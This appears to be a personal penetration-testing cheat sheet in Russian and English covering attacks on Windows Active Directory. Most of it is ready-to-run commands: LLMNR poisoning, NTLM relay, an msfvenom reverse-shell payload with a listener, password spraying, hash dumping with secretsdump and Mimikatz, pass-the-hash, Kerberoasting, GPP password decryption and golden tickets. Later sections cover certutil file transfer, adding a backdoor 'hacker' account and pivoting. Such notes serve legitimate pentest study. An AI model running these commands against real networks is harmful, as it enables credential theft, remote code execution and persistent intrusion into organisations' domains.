СОЗДАНИЕ ВИРТУАЛЬНОГО ОКРУЖЕНИЯ PYTHON: 
  virtualenv --python=python[version][VIRTUAL ENV NAME]
  source /path/virtual_env/activate

ПАКЕТ IMPACKET: https://github.com/SecureAuthCorp/impacket.git
---------------------------------------------------------------ACTIVE DIRECTORY---------------------------------------------------------------
nbtscan, smlclient, enum4linux - NETBION/SMB enumeration tools;
port 139 = SMB
port 445 = SMB over TCP
nmap script for SMB = /usr/share/nmap/scripts | grep -e "smb"

1) *LLMNR poisoning*: responder -i eth0 -wdr
2) *NTLM relay*: позволит выполнить ретрансляцию хэша на разные ИП в подсети, что позволяет выполнть команды на удаленном хосте. 
   *ВАЖНО*: smb signing enabled but not required. Для атаки нужен responder (отключить HTTP, SMB), ntlmrelay.py; payload можно сгенерировать в 
   msfvenom (msfvenom -p windows/meterpreter/reverse_tcp LHOST=<local ip> LPORT=<local port> -f exe -o shell.exe); 
   Создать SMB сервер для сбора хэшей: smbserver.py -smb2support SMB /root/SMB
   Доступ к атакуемой машине по SMB: ntlmrelayx.py -t 192.168.1.5 -l loot -i
   Сбор информации о домене: ntlmrelayx.py -t ldap://192.168.1.2
   Добавление нового компьютера в домен: ntlmrelayx.py -t ldaps://192.168.1.2 --add-computer
   Listener на локальном хосте: exploit/multi/handler, payload /windows/meterpreter/reverse_tcp
3) *Remote shell*: psexec.py, smbexec.py, wmiexec
4) *Pass spraying, enumeration*: crackmapexec.py
    crackmapexec smb <IP> -d lab.local -u <username> -p <passwords.txt> --shares
5) *Dump hashes*: crackmapexec smb <IP> -u USER -d DOMAIN -p 'PASSWORD' --sam, secretsdump.py DOMAIN/USERNAME:'PASSWORD'@<IP>;
6) *Pass the hash*: crackmapexec <IP> -u "John Doe" -H <NT hash> --local
                  psexec.py "John Doe":@<IP> -hashes LMHASH:NTHASH
7) *Token Impersonation with Incognito*: use metasploit psexec -> load incognito -> impersonate_token DOMAIN\\USER -> rev2self
8) Get domain service name: 
        setspn -L <ServerName> 
        setspn -L <domain\user>
        powershell_import /root/Desktop/GetUserSPNs.ps1 (https://github.com/nidem/kerberoast)
9) *Kerberoasting (get service password hash)*: GetUserSPN.py DOMAIN/USER:PASSWORD -dc-ip <DOMAIN CONTROLLER IP> -request
10) *GPP Attack*: auxiliary/smb_enum_gpp
    a. smbclient -L \\IP -N
    b. smbclient -L \\\\IP\\
    c. prompt off, recurse on, mget *, в файле Group.xml будут название сервиса и пароль TGS.
    d. gpp-decrypt <пароль TGS>
    e. psexec.py, kerberoasting GetUserSPN.py
krbtgt = kerberos ticket granting ticket, allow generate service ticket.
11) *Information Gathering*: git clone https://github.com/fox-it/BloodHound.py.git && cd BloodHound.py/ && pip install .
                             bloodhound-python -d lab.local -u <username> -p <password> -gc LAB2008DC01.lab.local -c all
**Mimikatz**: dump credentials stored in memory, credential dump, pass the hash, overpass the hash, pass the ticket, golden ticket, silver ticket.
https://github.com/gentilkiwi/mimikatz

1) privilege::
2) securlsa::logonpasswords
3) lsadump::sam /patch
4) lsadump::lsa /patch

Golden ticket attack:
1) lsadump::lsa /inject /name:krbtgt; Для проведения атаки нужен SID, NTLM.
2) Генерация golden ticket: kerberos::golden /User:<user> /domain:<domain name> /sid:<SID> /krbtgt:<NTLM> /id:<user id> /ptt
3) misc::cmd, список директорий dir \\<PC NAME>\c$

Дополнительные источники: 
https://adsecurity.org/
https://www.harmj0y.net/blog/powershell/kerberoasting-without-mimikatz/
https://www.ivoidwarranties.tech/posts/pentesting-tuts/cme/crackmapexec-cheatsheet/

---------------------------------------------------------------ПОЛЕЗНЫЕ СПРАВКИ И МАНУАЛЫ---------------------------------------------------------------
HASHCAT: https://hashcat.net/wiki/doku.php?id=hashcat
WINDOWS: https://gist.github.com/jivoi/c354eaaf3019352ce32522f916c03d70
WINDOWS (POWERSHELL): https://book.hacktricks.xyz/windows/basic-powershell-for-pentesters
PAYLOAD DELIVERY: https://securixy.kz/hack-faq/sbor-metodov-dostavki-nagruzok.html/
BLOODHOUND: https://hausec.com/2017/10/26/using-bloodhound-to-map-the-user-network/
ACTICVE DIRECTORY IMPACKET TOOLS: https://hausec.com/2019/03/12/penetration-testing-active-directory-part-ii/
PENTEST CHEETSHEET: https://hausec.com/pentesting-cheatsheet/
ACTIVE DIRECTORY METODOLOGY: https://adsecurity.org/wp-content/uploads/2018/08/2018-DEFCON-ExploitingADAdministratorInsecurities-Metcalf.pdf
ACTIVE DIRECTORY METODOLOGY: https://book.hacktricks.xyz/windows/active-directory-methodology
ACTIVE DIRECTORY HARDENING: https://github.com/PaulSec/awesome-windows-domain-hardening
---------------------------------------------------------------FILE TRANSFER---------------------------------------------------------------
1) certutil.ece -urlcache -f <file>;
2) python2 -m SimpleHTTPServer <port>; python3 -m http.server <port>;
3) python2 -m pyftplibd 21

---------------------------------------------------------------MAINTAINING ACCESS---------------------------------------------------------------
1) Windows: net user hacker password123 /add
--------------------------------------------------------------------PIVOTING--------------------------------------------------------------------
**First step**: for pivoting use metasploit: windows/smb/psexec
Get windows shell through meterpreter. In shell type: route print, arp -a;
Back to meterpreter: run autoroute -s 10.10.10.0/24; run autoroute -p;

